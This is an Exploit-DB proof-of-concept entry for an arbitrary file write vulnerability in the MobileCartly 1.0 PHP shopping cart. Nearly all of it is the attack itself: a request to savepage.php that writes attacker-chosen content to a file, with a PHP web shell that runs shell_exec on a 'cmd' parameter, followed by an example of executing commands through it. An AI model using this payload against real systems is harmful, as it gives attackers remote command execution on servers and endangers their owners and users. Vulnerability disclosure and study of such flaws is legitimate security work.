MobileCartly 1.0 - Arbitrary File Write Vulnerability

2012-08-10T00:00:00
ID EDB-ID:20422
Type exploitdb
Reporter Yakir Wizman
Modified 2012-08-10T00:00:00

Description

MobileCartly 1.0 - Arbitrary File Write Vulnerability. Webapps exploit for php platform

                                        
                                            # -----------------------------------------------------------
#			   _____ _ _            _      _ 
#			  / ____(_) |          | |    | |
#			 | |     _| |_ __ _  __| | ___| |
#			 | |    | | __/ _` |/ _` |/ _ \ |
#			 | |____| | || (_| | (_| |  __/ |
#			  \_____|_|\__\__,_|\__,_|\___|_|
#			  
# -----------------------------------------------------------
# MobileCartly 1.0 Arbitrary File Write Vulnerability
# Bug discovered by Yakir Wizman AKA Pr0T3cT10n, <yakir.wizman@gmail.com>
# Date 10/08/2012
# Download - http://mobilecartly.com/mobilecartly.zip
# ISRAEL
# -----------------------------------------------------------
#		Author will be not responsible for any damage.
# -----------------------------------------------------------
# I. DESCRIPTION
# -----------------------------------------------------------
# The application is prone to arbitrary file write / overwrite vulnerability.
#
# -----------------------------------------------------------
# II. PoC EXPLOIT
# -----------------------------------------------------------
# http://127.0.0.1/mobilecartly/includes/savepage.php?savepage=FILENAME&pagecontent=CODE
# FILENAME for example 'shell.php'
# CODE for example '<?php echo(shell_exec($_GET['cmd'])); ?>'
# Result example http://127.0.0.1/mobilecartly/pages/shell.php?cmd=dir
# -----------------------------------------------------------